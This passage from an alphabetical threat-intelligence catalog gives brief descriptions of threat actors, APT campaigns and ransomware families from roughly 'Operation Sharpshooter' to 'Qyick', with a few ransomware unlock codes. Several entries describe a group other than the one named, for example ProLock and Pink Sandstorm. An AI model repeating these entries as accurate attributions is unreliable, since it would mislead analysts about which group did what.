The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries. Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.
Operation Soft Cell
In 2018, the Cybereason Nocturnus team identified an advanced, persistent attack targeting global telecommunications providers carried out by a threat actor using tools and techniques commonly associated with Chinese-affiliated threat actors, such as APT10. This multi-wave attacks focused on obtaining data of specific, high-value targets and resulted in a complete takeover of the network.
Operation Triangulation
Operation Triangulation is an ongoing APT campaign targeting iOS devices with zero-click iMessage exploits. The threat actor behind the campaign has been active since at least 2019 and continues to operate. The attack chain involves the delivery of a malicious iMessage attachment that launches a series of exploits, ultimately leading to the deployment of the TriangleDB implant. Kaspersky researchers have discovered and reported multiple vulnerabilities used in the campaign, with patches released by Apple.
Operation WizardOpium
We are calling these attacks Operation WizardOpium. So far, we have been unable to establish a definitive link with any known threat actors. There are certain very weak code similarities with Lazarus attacks, although these could very well be a false flag. The profile of the targeted website is more in line with earlier DarkHotel attacks that have recently deployed similar false flag attacks.
Operation Wocao
Operation Wocao (我操, “Wǒ cāo”, used as “shit” or “damn”) is the name that Fox-IT uses to describe the hacking activities of a Chinese based hacking group. This report details the profile of a publicly underreported threat actor that Fox-IT has dealt with over the past two years. Fox-IT assesses with high confidence that the actor is a Chinese group and that they are likely working to support the interests of the Chinese government and are tasked with obtaining information for espionage purposes. With medium confidence, Fox-IT assesses that the tools, techniques and procedures are those of the actor referred to as APT20 by industry partners. We have identified victims of this actor in more than 10 countries, in government entities, managed service providers and across a wide variety of industries, including Energy, Health Care and High-Tech.
Orca
Orca is an active extortion or ransomware group tracked by RansomLook.
Ordinal
ransomware
Ordinypt
ransomware
Organised Crime and Intelligence Unit[30]
Organised Crime and Intelligence Unit[30]
orion
Jan13, 2026: We believe the group might be related to Babuk-Bjorka.
Osiris
Osiris is an active extortion or ransomware group tracked by RansomLook.
Osno
ransomware
Osyolorz Collective
Osyolorz Collective is an active extortion or ransomware group tracked by RansomLook.
OurMine
OurMine is known for celebrity internet accounts, often causing cyber vandalism, to advertise their commercial services. (Trend Micro) In light of the recent report detailing its willingness to pay US$250,000 in exchange for the 1.5 terabytes’ worth of data swiped by hackers from its servers, HBO finds itself dealing with yet another security breach. Known for hijacking prominent social media accounts, the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network. These include accounts for HBO shows, such as “Game of Thrones,” “Girls,” and “Ballers.” This is not the first time that OurMine has claimed responsibility for hacking high- profile social networking accounts. Last year, the group victimized Marvel, The New York Times, and even the heads of some of the biggest technology companies in the world. Mark Zuckerberg, Jack Dorsey, Sundar Pichai, and Daniel Ek — the CEOs of Facebook, Twitter, Google and Spotify, respectively — have also fallen victim to the hackers, dispelling the notion that a career in software and technology exempts one from being compromised.
OUTLAW SPIDER
On May 7, 2019, Mayor Bernard “Jack” Young confirmed that the network for the U.S. City of Baltimore (CoB) was infected with ransomware, which was announced via Twitter1. This infection was later confirmed to be conducted by OUTLAW SPIDER, which is the actor behind the RobbinHood ransomware. The actor demanded to be paid 3 BTC (approximately $17,600 USD at the time) per infected system, or 13 BTC (approximately $76,500 USD at the time) for all infected systems to recover the city’s files.
OverFlame
OverFlame is a hacktivist group known for executing DDoS attacks and website defacements, primarily targeting government institutions and corporations in Europe and North America. The group has been involved in coordinated attacks alongside other pro-Russian threat actors, such as NoName057and the People’s Cyber Army, often motivated by anti-government and anti-corporate sentiments. OverFlame operates through underground forums and encrypted messaging platforms to coordinate attacks and recruit members. Their activities have included targeting financial services, political parties, and educational institutions, demonstrating a focus on disrupting critical infrastructure.
OVERLORD SPIDER
OVERLORD SPIDER, aka The Dark Overlord. Similar to ransomware operators today, OVERLORD SPIDER likely purchased RDP access to compromised servers on underground forums in order to exfiltrate data from corporate networks. The actor was known to attempt to “sell back” the data to the respective victims, threatening to sell the data to interested parties should the victim refuse to pay. There was at least one identified instance of OVERLORD SPIDER successfully selling victim data on an underground market.
Owl
Ransomware
Ox Thief
Ox Thief is an active extortion or ransomware group tracked by RansomLook.
OzozaLocker Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. https://3.bp.blogspot.com/--jubfYRaRmw/WDaOyZXkAaI/AAAAAAAACQE/E63a4FnaOfACZ07s1xUiv_haxy8cp5YCACLcB/s1600/ozoza2.png
Pacha Group
Antd is a miner found in the wild on September 18, 2018. Recently we discovered that the authors from Antd are actively delivering newer campaigns deploying a broad number of components, most of them completely undetected and operating within compromised third party Linux servers. Furthermore, we have observed that some of the techniques implemented by this group are unconventional, and there is an element of sophistication to them. We believe the authors behind this malware are from Chinese origin. We have labeled the undetected Linux.Antd variants, Linux.GreedyAntd and classified the threat actor as Pacha Group.
Packrat
A threat group that has been active for at least seven years has used malware, phishing and disinformation tactics to target activists, journalists, politicians and public figures in various Latin American countries. The threat actor, dubbed Packrat based on its preference for remote access Trojans (RATs) and because it has used the same infrastructure for several years, has been analyzed by Citizen Lab researchers John Scott-Railton, Morgan Marquis-Boire, and Claudio Guarnieri, and Cyphort researcher Marion Marschalek, best known for her extensive analysis of state-sponsored threats.
Pacman
ransomware
PadCrypt
Ransomware has a live support chat
Padlock Screenlocker
Ransomware Unlock code is: ajVr/G\ RJz0R
Palace Office (Oman)
The Palace Office [Foreign Intelligence]
PALE PANDA
PALE PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Palestinian National Security Forces
Palestinian National Security Forces
Palestinian Preventive Security
Palestinian Preventive Security (internal security)
Pandora
Ransomware
Paradise Ransomware
MalwareHunterTeam discovered a new Paradise Ransomware variant that uses the extension _V.0.0.0.1{paradise@all-ransomware.info}.prt and drops a ransom note named PARADISE_README_paradise@all-ransomware.info.txt.
Paradise
Paradise is an active extortion or ransomware group tracked by RansomLook.
paradise2
paradise2 is an active extortion or ransomware group tracked by RansomLook.
Parasite
ransomware
PARINACOTA
One actor that has emerged in this trend of human-operated attacks is an active, highly adaptive group that frequently drops Wadhrama as payload. PARINACOTA impacts three to four organizations every week and appears quite resourceful: during the 18 months that we have been monitoring it, we have observed the group change tactics to match its needs and use compromised machines for various purposes, including cryptocurrency mining, sending spam emails, or proxying for other attacks. The group’s goals and payloads have shifted over time, influenced by the type of compromised infrastructure, but in recent months, they have mostly deployed the Wadhrama ransomware. The group most often employs a smash-and-grab method, whereby they attempt to infiltrate a machine in a network and proceed with subsequent ransom in less than an hour. There are outlier campaigns in which they attempt reconnaissance and lateral movement, typically when they land on a machine and network that allows them to quickly and easily move throughout the environment. PARINACOTA’s attacks typically brute forces their way into servers that have Remote Desktop Protocol (RDP) exposed to the internet, with the goal of moving laterally inside a network or performing further brute-force activities against targets outside the network. This allows the group to expand compromised infrastructure under their control. Frequently, the group targets built-in local administrator accounts or a list of common account names. In other instances, the group targets Active Directory (AD) accounts that they compromised or have prior knowledge of, such as service accounts of known vendors. The group adopted the RDP brute force technique that the older ransomware called Samas (also known as SamSam) infamously used. Other malware families like GandCrab, MegaCortext, LockerGoga, Hermes, and RobbinHood have also used this method in targeted ransomware attacks. PARINACOTA, however, has also been observed to adapt to any path of least resistance they can utilize. For instance, they sometimes discover unpatched systems and use disclosed vulnerabilities to gain initial access or elevate privileges.
PassCV
The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates. Snorre Fagerland of Blue Coat Systems first coined the term PassCV in a blog post. His post provides a good introduction to the group and covers some of the older infrastructure, stolen code-signing certificate reuse, and other connections associated with the PassCV malware. There are several clues alluding to the possibility that multiple groups may be utilizing the same stolen signing certificates, but at this time SPEAR believes the current attacks are more likely being perpetrated by a single group employing multiple publicly available Remote Administration Tools (RATs). The PassCV group has been operating with continued success and has already started to expand their malware repertoire into different off-the-shelf RATs and custom code. SPEAR identified eighteen previously undisclosed stolen Authenticode certificates. These certificates were originally issued to companies and individuals scattered across China, Taiwan, Korea, Europe, the United States and Russia. In this post we expand the usage of the term ‘PassCV’ to encompass the malware mentioned in the Blue Coat Systems report, as well as the APT group behind the larger C2 infrastructure and stolen Authenticode certificates. We’d like to share some of our findings as they pertain to the stolen certificates, command and control infrastructure, and some of the newer custom RATs they’ve begun development on.
PassLock
ransomware
Patched Lightning
Microsoft threat actor profile from the public naming mapping feed.
Patcher
Ransomware Targeting macOS users
Pay-or-Lost
ransomware
Pay2Decrypt
ransomware
PayDay Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc… The ransom is R$950 which is due in 5 days. (R$ is a Brazilian currency) Based off of Hidden-Tear
PayDOS Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Batch file; Passcode: AES1014DW256 or RSA1014DJW2048
PayForNature
ransomware
Payload
Payload is an active extortion or ransomware group tracked by RansomLook.
Payloadbin
Payloadbin is an active extortion or ransomware group tracked by RansomLook.
Paymen45
ransomware
Payment
ransomware
payoutsking
Payouts King Group. We are not RaaS. No affiliates are accepted. We use Tox messaging protocol.
PaySafeGen (German) Ransomware
This is most likely to affect German speaking users, since the note is written in German. Mostly affects users in German speaking countries. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
PayTool
PayTool is a threat actor that operates a phishing ecosystem focused on traffic violation and fine payment scams targeting Canadians through SMS-based social engineering. Their campaigns impersonate Canadian government traffic enforcement services, utilizing a federal-style "Traffic Ticket Search Portal" model that aggregates provincial fine payment portals. PayTool maintains a pool of generic domains to ensure continuity when specific provincial domains are blacklisted, exploiting brand trust with disposable domains. Recommendations include implementing DNS and web gateway controls to block newly registered domains and known PayTool-related IP ranges.
PClock и PClock2
ransomware
PClock3 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoLocker Copycat
PClock4 Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam (for example: “you have a criminal case against you”), fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
pear
ABOUT US:
"Pure Extraction And Ransom (PEAR) Team is the community of highly responsible and strictly disciplined members. We are a private team and have nothing common with any other threat actors. We've been monitoring this field for a long-long time. So, we understand all the processes and know well how it all works."
Pearl Sleet
Pearl Sleet is a nation state activity group based in North Korea that has been active since at least 2012. They primarily target defectors from North Korea, media organizations in carrying out their cyber espionage activities.
PEC 2017
ransomware
Pedcont
new destrucrtive ransomware called Pedcont that claims to encrypt files because the victim has accessed illegal content on the deep web. The screen then goes blank and becomes unresponsive.
Pendor
ransomware
Pennywise
ransomware
People's Cyber Army of Russia
People's Cyber Army of Russia is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
People's Liberation Army Air Force
People's Liberation Army Air Force (PLAAF)
People's Liberation Army General Political Department
People's Liberation Army General Political Department (GND)
People's Liberation Army General Staff Department
People's Liberation Army General Staff Department (GSD)
PerSwaysion
PerSwaysion is a threat actor known for conducting phishing campaigns targeting high-level executives. They have been active since at least August 2019 and are believed to be based in Vietnam. PerSwaysion has recently updated their techniques, using more direct phishing methods and leveraging Microsoft 365 to steal credentials.
PetrWrap Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Petya
Ransomware encrypts disk partitions PDFBewerbungsmappe.exe
PewCrypt +decrypt
ransomware
PewDiePie
ransomware
PewPew
ransomware
Phalcon
Phalcon is an active extortion or ransomware group tracked by RansomLook.
PhantomControl
PhantomControl is a sophisticated threat actor that emerged in November 2023. They utilize phishing emails as their initial infection vector and employ a ScreenConnect client to establish a connection for their malicious activities. Their arsenal includes a VBS script that hides its true intentions and reveals a complex mechanism involving PowerShell scripts and image-based data retrieval. PhantomControl has been associated with the Blind Eagle threat actors, showcasing their versatility and reach.
Philadelphia
Ransomware Coded by "The_Rainmaker"
Phlox Tempest
Phlox Tempest is a threat actor responsible for a large-scale click fraud campaign targeting users through YouTube comments and malicious ads. They use ChromeLoader to infect victims' computers with malware, often delivered as ISO image files that victims are tricked into downloading. The attackers aim to profit from clicks generated by malicious browser extensions or node-WebKit installed on the victim's device. Microsoft and other cybersecurity organizations have issued warnings about this ongoing and prevalent campaign.
Phobos Ransomware Actors
This object represents a collection of MITRE ATT&CK® Techniques and other objects (Software and/or Campaigns) related to the Phobos ransomware-as-a-service ("RaaS") operation. Further background & contextual details can be found in the References tab below.
Phobos
Phobos exploits open or poorly secured RDP ports to sneak inside networks and execute a ransomware attack, encrypting files and demanding a ransom be paid in bitcoin for returning the files, which in this case are locked with a .phobos extension.
PhobosImposter
ransomware
PhoneNumber
ransomware
PHP
ransomware
Pickaxe
Prying Libra, also known as Pickaxe, is a threat actor active since at least August 2017, and continues to remain active to this day. The adversary's goal is to install and maintain a popular cryptocurrency miner on the victim's machine. The miner in question is an open-source tool named XMRig that generates the Monero cryptocurrency. Malware is delivered via downloads through the popular Adfly advertisement platform. Users are often mislead into clicking on a malicious advertisement that results in the payload being delivered to the victim. Once installed, the malware leverages VBS scripts and redirection services, such as bitly, to ultimately download and execute XMRig. Over 15 million confirmed victims have been discovered to be infected in recent campaigns, with actual numbers likely to be between 30-45 million victims. The victims are found across the globe, with high concentrations in Thailand, Vietnam, Egypt, Indonesia, and Turkey.
PicklesRansomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Python Ransomware
PICO Ransomware
S!Ri found a new Thanatos Ransomware variant called PICO Ransomware. This ransomware will append the .PICO extension to encrypted files and drop a ransom note named README.txt.
PINCHY SPIDER
First observed in January 2018, GandCrab ransomware quickly began to proliferate and receive regular updates from its developer, PINCHY SPIDER, which over the course of the year established a RaaS operation with a dedicated set of affiliates. CrowdStrike Intelligence has recently observed PINCHY SPIDER affiliates deploying GandCrab ransomware in enterprise environments, using lateral movement techniques and tooling commonly associated with nation-state adversary groups and penetration testing teams. This change in tactics makes PINCHY SPIDER and its affiliates the latest eCrime adversaries to join the growing trend of targeted, low-volume/high-return ransomware deployments known as “big game hunting.” PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab, which has been active since January 2018. PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts. The program is operated with a 60-40 split in profits (60 percent to the customer), as is common among eCrime actors, but PINCHY SPIDER is also willing to negotiate up to a 70-30 split for “sophisticated” customers.
Pink Sandstorm
Agonizing Serpens is an Iranian-linked APT group that has been active since 2020. They are known for their destructive wiper and fake-ransomware attacks, primarily targeting Israeli organizations in the education and technology sectors. The group has strong connections to Iran's Ministry of Intelligence and Security and has been observed using various tools and techniques to bypass security measures. They aim to steal sensitive information, including PII and intellectual property, and inflict damage by wiping endpoints.
PirateJack Actor
"PirateJack" is a username used by a threat actor on underground cybercriminal forums. The actor has been observed attempting to sell numerous accesses to corporate networks mainly gained through compromise of VPN software.[[CYJAX Initial Access Broker Report June 2024](/references/5a20c423-c4c0-4601-9e4d-028df0297568)]
Piratelock
Piratelock is an active ransomware-as-a-service operation tracked by RansomLook.
Pirateware
ransomware
Pizhon
ransomware
PizzaCrypts
Ransomware
PIZZO SPIDER
PIZZO SPIDER is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
PL
ransomware
Planetary
First discovered by malware security analyst, Lawrence Abrams, PLANETARY is an updated variant of another high-risk ransomware called HC7.
Play
Play is a ransomware group that has been active since at least 2022 deploying Playcrypt ransomware against the business, government, critical infrastructure, healthcare, and media sectors in North America, South America, and Europe. Play actors employ a double-extortion model, encrypting systems after exfiltrating data, and are presumed by security researchers to operate as a closed group. [CISA Play Ransomware Advisory December 2023](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-352a) [Trend Micro Ransomware Spotlight Play July 2023](https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-play)
Playboy
Playboy is an active extortion or ransomware group tracked by RansomLook.
PleaseRead Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc..
PLUMP SPIDER
A cybercriminal actor that uses voice phishing to gain access to compromise environments and initiate fraudulent transactions from victim payment systems.[[CrowdStrike 2025 Global Threat Report](/references/a69b0ce3-f314-4b32-bfb3-b1380c4f0ec4)]
PlushDaemon
PlushDaemon is a China-aligned APT group that has conducted cyberespionage operations against targets in China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand. They executed a supply chain attack on the South Korean VPN provider IPany, compromising its installer to deploy the SlowStepper backdoor, which features a toolkit of over 30 components. PlushDaemon primarily gains initial access by hijacking legitimate updates of Chinese applications and has also exploited vulnerabilities in legitimate web servers. Additionally, they have utilized the Visual Studio command line utility regcap.exe to side-load a malicious DLL named lregdll.dll.
POISON CARP
Between November 2018 and May 2019, senior members of Tibetan groups received malicious links in individually tailored WhatsApp text exchanges with operators posing as NGO workers, journalists, and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages. This campaign was carried out by what appears to be a single operator that we call POISON CARP.
PoisonFang
ransomware
PoisonSeed
PoisonSeed is a threat actor employing an MFA-resistant phishing kit to acquire credentials from individuals and organizations, primarily targeting email infrastructure for cryptocurrency-related spam. They utilize spear-phishing emails with malicious links, automate bulk downloading of email lists, and capture authentication cookies to bypass MFA. PoisonSeed has been linked to campaigns that exploit cross-device sign-in features and employ tactics such as cryptocurrency seed phrase poisoning. Their infrastructure includes domains registered through NICENIC and hosted on Cloudflare, with a focus on phishing CRM and bulk email provider credentials.
POISONUS PANDA
POISONUS PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Pojie
ransomware
PokemonGO
Ransomware Based on Hidden Tear
Police Bureau of Investigation
Police Bureau of Investigation (PBI)
Political Security Directorate
Political Security Directorate
Political Security Organization
Political Security Organization (PSO)
Politiets sikkerhetstjeneste
Politiets sikkerhetstjeneste (PST) (Police Security Service)
Polski Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The Ransom is 249$ and the hacker demands that the victim gets in contact through e-mail and a Polish messenger called Gadu-Gadu.
Polyglot
Ransomware Immitates CTB-Locker
Polyvice
Polyvice is an active extortion or ransomware group tracked by RansomLook.
PonyFinal
ransomware
PooleZoor
ransomware
PopCorn Time Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. These hackers claim to be students from Syria. This ransomware poses as the popular torrent movie screener called PopCorn. These criminals give you the chance to retrieve your files “for free” by spreading this virus to others. Like shown in the note bellow: https://www.bleepstatic.com/images/news/ransomware/p/Popcorn-time/refer-a-friend.png
PopCornTime
ransomware
PornBlackmailer
A new infection is being distributed by porn sites that tries to blackmail a victim into paying a ransom by stating they will tell law enforcement that the victim is spreading child porn. This is done by collecting information about the user, including screen shots of their active desktop, in order to catch them in compromising situations.
Potato Ransomware
Wants a ransom to get the victim’s files back . Originated in English. Spread worldwide.
Povisomware
ransomware
PowerHentai
ransomware
PowerLocky
ransomware
PowerPool
Malware developers have started to use the zero-day exploit for Task Scheduler component in Windows, two days after proof-of-concept code for the vulnerability appeared online. A security researcher who uses the online name SandboxEscaper on August 27 released the source code for exploiting a security bug in the Advanced Local Procedure Call (ALPC) interface used by Windows Task Scheduler. More specifically, the problem is with the SchRpcSetSecurity API function, which fails to properly check user's permissions, allowing write privileges on files in C:\Windows\Task. The vulnerability affects Windows versions 7 through 10 and can be used by an attacker to escalate their privileges to all-access SYSTEM account level. A couple of days after the exploit code became available (source and binary), malware researchers at ESET noticed its use in active malicious campaigns from a threat actor they call PowerPool, because of their tendency to use tools mostly written in PowerShell for lateral movement. The group appears to have a small number of victims in the following countries: Chile, Germany, India, the Philippines, Poland, Russia, the United Kingdom, the United States, and Ukraine. The researchers say that PowerPool developers did not use the binary version of the exploit, deciding instead to make some subtle changes to the source code before recompiling it.
PowerShell Locker 2013
ransomware
PowerShell Locker 2015
ransomware
PowerWare
Ransomware Open-sourced PowerShell
PowerWorm
Ransomware no decryption possible, throws key away, destroys the files
PPDDDP
ransomware
Pr0tector
ransomware
PREDATOR PANDA
PREDATOR PANDA is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.
Predator
ransomware
Predatory Sparrow
A self-proclaimed hacktivist group that carried out attacks against Iranian railway systems and against Iranian steel plants.
Priapos
ransomware
Princess Evolution
We have been observing a malvertising campaign via Rig exploit kit delivering a cryptocurrency-mining malware and the GandCrab ransomware since July 25. On August 1, we found Rig’s traffic stream dropping a then-unknown ransomware. Delving into this seemingly new ransomware, we checked its ransom payment page in the Tor network and saw it was called Princess Evolution (detected by Trend Micro as RANSOM_PRINCESSLOCKER.B), and was actually a new version of the Princess Locker ransomware that emerged in 2016. Based on its recent advertisement in underground forums, it appears that its operators are peddling Princess Evolution as a ransomware as a service (RaaS) and are looking for affiliates. The new malvertising campaign we observed since July 25 is notable in that the malvertisements included Coinhive (COINMINER_MALXMR.TIDBF). Even if users aren’t diverted to the exploit kit and infected with the ransomware, the cybercriminals can still earn illicit profit through cryptocurrency mining. Another characteristic of this new campaign is that they hosted their malvertisement page on a free web hosting service and used domain name system canonical name (DNS CNAME) to map their advertisement domain on a malicious webpage on the service.
Princess Locker
Ransomware
Prinz Eugen
Prinz Eugen is an active extortion or ransomware group tracked by RansomLook.
PRISM
Ransomware
ProCC
ProCC is a threat actor targeting the hospitality sector with remote access Trojan malware. They use email attachments to exploit vulnerabilities like CVE-2017-0199 and deploy customized versions of RATs such as RevengeRAT, NjRAT, NanoCoreRAT, and 888 RAT. ProCC's malware is capable of collecting data from the clipboard and printer spooler, as well as capturing screenshots on infected machines.
Project23
ransomware
Project34 Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Project57
ransomware
ProjectSauron
ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how attackers learned from other extremely advanced actors in order to avoid repeating their mistakes. As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry. That usually results in several infections in countries within that region, or in the targeted industry around the world. Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all key entities it could possibly reach within the target area. The name, ProjectSauron reflects the fact that the code authors refer to ‘Sauron’ in the Lua scripts.
Prolific Puma
Prolific Puma provides an underground link shortening service to criminals. Infoblox states that during analysis, no legitimate content was observed being served through their shortener. For operation they use a registered domain generation algorithm (RDGA), based upon which they registered between 35k-75k domain names.
ProLock
PwndLocker is a ransomware that was observed in late 2019 and is reported to have been used to target businesses and local governments/cities. According to one source, ransom amounts demanded as part of PwndLocker activity range from $175k USD to $650k USD depending on the size of the network. PwndLocker attempts to disable a variety of Windows services so that their data can be encrypted. Various processes will also be targeted, such as web browsers and software related to security, backups, and databases. Shadow copies are cleared by the ransomware, and encryption of files occurs once the system has been prepared in this way. Executable files and those that are likely to be important for the system to continue to function appear to be skipped by the ransomware, and a large number of folders mostly related to Microsoft Windows system files are also ignored. As of March 2020, encrypted files have been observed with the added extensions of .key and .pwnd. Ransom notes are dropped in folders where encrypted files are found and also on the user's desktop.
Prometey
ransomware
Prometheus
Ransomware written in .NET, apparently derived from the codebase of win.hakbit (Thanos) ransomware.
Prophet Spider
PROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by compromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities. The adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in multiple instances.
ProposalCrypt Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransom is 1.0 bitcoins.
Protected
ransomware
Proton
Proton is an active extortion or ransomware group tracked by RansomLook.
Providence
Providence is an active extortion or ransomware group tracked by RansomLook.
Proxima
Proxima is an active extortion or ransomware group tracked by RansomLook.
Ps2exe
Ransomware
PSCrypt
ransomware
PshCrypt
ransomware
PTP
ransomware
PUBG Ransomware
In what could only be a joke, a new ransomware has been discovered called "PUBG Ransomware" that will decrypt your files if you play the game called PlayerUnknown's Battlegrounds. Discovered by MalwareHunterTeam, when the PUBG Ransomware is launched it will encrypt a user's files and folders on the user's desktop and append the .PUBG extension to them. When it has finished encrypting the files, it will display a screen giving you two methods that you can use to decrypt the encrypted files.
Public Security Intelligence Agency
Public Security Intelligence Agency (PSIA)
PulpFictionQuote
ransomware
Pulpy
ransomware
Pump
ransomware
Punisher
Punisher is an active extortion or ransomware group tracked by RansomLook.
puNK-003
puNK-003 is a North Korean APT group known for deploying the Lilith RAT, a sophisticated C++ remote access trojan, and its AutoIt variant, CURKON, which functions as a downloader. The group primarily distributes malware through targeted phishing attacks using malicious LNK files. Analysis indicates that puNK-003 shares similarities with the KONNI group, particularly in the use of AutoIt scripts and specific coding functions. Key indicators of infection include unusual network activity and system slowdowns, with removal methods involving specialized antivirus software and manual techniques.
PureLocker
ransomware
PurpleHaze
PurpleHaze is a China-nexus threat actor tracked by SentinelLABS, linked to APT15, known for targeting critical infrastructure sectors such as telecommunications and government organizations. The actor has been associated with reconnaissance attempts against SentinelOne and has utilized ShadowPad, a modular backdoor platform, for cyberespionage and potential ransomware deployment. Investigations are ongoing to determine overlaps between ShadowPad intrusions and PurpleHaze activity, highlighting the extensive sharing of malware and operational practices among Chinese threat groups. The targeting of third-party service providers has raised significant concerns regarding operational security and supply chain monitoring.
PwndLocker
ransomware
PyL33T Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
Pyrx
Pyrx is an active extortion or ransomware group tracked by RansomLook.
PyteHole
ransomware
Python
ransomware
PZDC
ransomware
Qatar State Security
Qatar State Security
Qilin Ransomware Actors
An object to catalog the TTP and threat object relationships associated with actors known to deploy Qilin ransomware and variants.
Qilin Securotrop
Qilin Securotrop is an active extortion or ransomware group tracked by RansomLook.
Qilin
Qilin is a ransomware group that first appeared in 2022 but had a breakout year in 2024, with around 200 victims, 156 of them based in the U.S.
Qinynore
ransomware
Qiulong
Qiulong is an active extortion or ransomware group tracked by RansomLook.
qkG
Security researchers have discovered a new ransomware strain named qkG that targets only Office documents for encryption and infects the Word default document template to propagate to new Word documents opened through the same Office suite on the same computer.
Qlocker
login page, no posts
QNAPCrypt
ransomware
QP
ransomware
Quad7 Botnet Operators
7777 or Quad7 is a botnet used to compromise network devices such as TP-LINK small office/home office ("SOHO") routers and use the infected devices to relay password spraying attacks against Microsoft 365 accounts.[[Sekoia.io Blog July 23 2024](/references/ae84e72a-56b3-4dc4-b053-d3766764ac0d)][[Sekoia.io Blog September 9 2024](/references/eb4a1888-3b04-449b-9738-d96ae26adfee)] This object reflects the various Techniques observed in use by the threat actors known to operate this botnet.
QuakeWay
ransomware
Quantum Ransomware Actors
This Group object reflects the tools & TTPs associated with threat actors known to deploy Quantum ransomware (aka Quantum Locker, which derives from the MountLocker, AstroLocker, and XingLocker ransomware families). The Quantum group is known to publicly extort its victims.[[Cybereason Quantum Ransomware May 9 2022](/references/19027620-216a-4921-8d78-f56377778a12)] Researchers indicate the group is a rebranding of the "Conti Team Two" that formed after the fragmenting of the Ryuk/Conti ransom group in early 2022.[[AdvIntel Bazar Call August 10 2022](/references/5d3dff70-28c2-42a5-bf58-211fe6491fd2)]
Quantum
Quantum is an active extortion or ransomware group tracked by RansomLook.
Quicklock
Quicklock is an active extortion or ransomware group tracked by RansomLook.
QUILTED TIGER
Dropping Elephant (also known as “Chinastrats” and “Patchwork“) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools. Its victims are all involved with China’s foreign relations in some way, and are generally caught through spear-phishing or watering hole attacks.
Quoter
Quoter is an active extortion or ransomware group tracked by RansomLook.
Qwerty Ransomware
A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program to encrypt a victim's files. Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victims files, overwrite the originals, and the append the .qwerty extension to an encrypted file's name.
Qweuirtksd
ransomware
Qyick Ransomware
Ransomware
R
